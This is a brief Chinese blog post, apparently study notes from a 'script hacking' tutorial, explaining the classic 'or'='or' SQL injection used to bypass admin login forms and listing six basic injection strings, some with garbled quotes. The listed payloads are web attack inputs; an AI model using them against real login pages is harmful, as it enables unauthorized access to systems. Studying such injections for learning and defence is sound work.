精通脚本黑客 2.2 'or'='or'经典漏洞攻击

来源:互联网 发布:sails.js 开发api 编辑:程序博客网 时间:2024/06/06 23:39

‘or’=’or’经典漏洞攻击

这是一个经典的漏洞,主要出现在后台登录上,其实就是一个简单的sql注入,通过屏蔽语法来进行入侵。

(1)

基本语句:

  1. ‘a’ or ’ 1=1–
  2. ‘or1=1–
  3. “or1=1–
  4. ‘or’a’=’a
  5. “or”=”a’=’a
  6. ) or (‘a’=’a
    以上只是sql简单的注入学习,只是为了以后学习进行一个记录

(2)

后台名

这里写图片描述
这里写图片描述

以上。

原创粉丝点击